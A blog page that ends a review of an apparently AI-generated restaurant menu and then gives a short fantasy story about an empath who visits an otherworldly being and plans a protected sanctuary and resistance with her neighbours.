This is not just food; it's a journey for the senses, a story told through flavor and texture, leaving James Beard speechless (and perhaps, slightly envious).

Review

Wow, what a different response! This one could actually be a menu, with the wines having robust and specific descriptions. I especially like how the wines are sourced from all over the globe, really picking best of breed in the selections. As good as the wines are, however, the food does not look 3-star level to me. The dishes sound really nice, and there’s a fair bit of molecular gastronomy in there. However, aside from the poetic nature of the menu, I’m not sure this is a top-tier menu for a chef to execute.

Still, most of these items are good enough for a fake restaurant. If this was to show up in a video game or a novel, I think most people would accept it and move on.

 
Read more...

from Psychomancer

“I can already tell it wasn't good news,” Peter said, obviously reading my down-turned eyes and lack of smile, perhaps the color of my cheeks. “Usually, when you come back, you're bubbly,” he added. “But you look like you are about to tell me my cat has cancer.” Peter was plump, like me, with the hint of an East Coast accent and constant twinkle in his eyes. He was also invisible when looking The Other Way. Not just to me, but to everyone and everything. As an empath, having a friend I cannot read is delightful. And he was right, it wasn't good news, but not all bad, either. He leads the way, in silence, to my study where light refreshments are waiting. We sit side-by-side on the antique sofa, where I've often slipped from my body into the æther. But the trip I just took required a more controlled and thoughtful environment. I grip Peter's hand, “They showed me quite a bit.” “Was Saffron there?” he asks. I snicker, “Why do you call her that?” He shrugs, “'Saffron' seems to match her essence and I can't pronounce a string of animated, hyper-dimensional ideograms.” “Yes,” I say. “She was waiting for me at the Carnival.” I take a deep breath and exhale slowly. “Do you want the bottom line or the whole story?” I ask. Peter just raises an eyebrow. “'Whole story' it is, then.”

The sky was a kaleidoscope of pinks, purples, and colors I can't describe, rotating, folding, emerging. It's always breathtaking. But they created the Carnival for me to have a familiar place to walk, to anchor my perception. They know me and treat me with some level of respect afforded to those who pass their tests. She knew why I was there. They always know. She was shorter than me, humanoid but shaped like a bowling ball with pale / grey / ashen / luminescent skin and blue / black / red hair in a pony tail / pixie cut. She gave me cotton candy flavored like dreams. “You must / will ask / plead / already know,” she said. “How can we stop it? How can we save ourselves from the hatred fueling the move toward authoritarian fascism?” I asked. “You cannot / will not / must not / could never / not your fault,” she told me. With a gesture, she showed me how far back it goes, how helpless we are against the sins of our ancestors and our descendants. The flood of information, pictures, sounds, words, entire histories was far too much for a human mind to comprehend. But I've been here enough times to know the rules are different. I was able to “slow it down” and comprehend what she was telling me. The world we live in is based on slavery, colonization, conquest, manufactured inequality, and brutality. She showed me versions of earth where there was no Inquisition, no Alexander the Great, no Genghis Khan, no British expansion, no slavery, no extermination of natives, no treating one human as less than another for reasons beyond their control. Thousands of variations. Millions of possibilities. They created worlds unrecognizable. Certainly you and I did not exist, but neither did the countries we know, the languages, the technology. They were so far removed from here as to be fantasy. And they were the only worlds that did not succumb to this culmination of hatred. She showed me as far back as the founding of the United States that it was already too late. All we can do is shift the timeline. There are some things mankind must experience so that we do not forget what we are capable of.

“I'm sure that's not where she left it,” Peter interrupts. “They don't do that.” I nod, “True, but it's not much better.” “I have privileges. The privilege of generational wealth, the color of my skin, a home that is paid for, the ability to see other people's truths before they do.” I squeeze Peter's hand, “Friends I can trust and lean on.” “Being an out lesbian pagan puts me at risk, but I can protect myself,” I say, adding only in thought, “for now.” I lower my head, “She suggested I bolster our defenses and, along with everyone else, experience humanity seeing itself as it really is.” “She said we must acknowledge and confront what we are in order to become what we might be.” “She reminded me that I have been spared the violence that murders and marginalizes people for their gender or the color of their skin or the deity they worship or any uncontrollable circumstance of their birth. I have been immune to the violence inflicted on others for not being male and heterosexual because of my privileges.” I turn and hold both Peter's hands. He can see the change on my face because he smiles and nods for me to continue. He knows I have a plan. “I want to work with Doug and Eric, even Emma and Eunice to turn our shared acerage into an official sanctuary, fully warded and protected. We'd need your expertise with runes, obviously.” Peter chuckles, “If we can't save everyone, we'll save who we can?” “For starters,” I say, grinning. Peter squints and I can tell he's working it out, thinking about the specific connections, knowledge, skills, talents, and resources of each of my neighbors. The psychedelic techbro, the lycanthrope luddite, the conspiracy theorist empath, the bitter faeries living in my garden, the sacred space we all maintain and respect. “We're gonna organize a resistance,” he says flatly. I'm beaming, slowly nodding, “We are going to organize a resistance.”


#Psychomancer #Writing #ShortFiction #Writer #Writers #WritersOfMastodon


CC BY-NC-SA 4.0 This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License

 
Read more...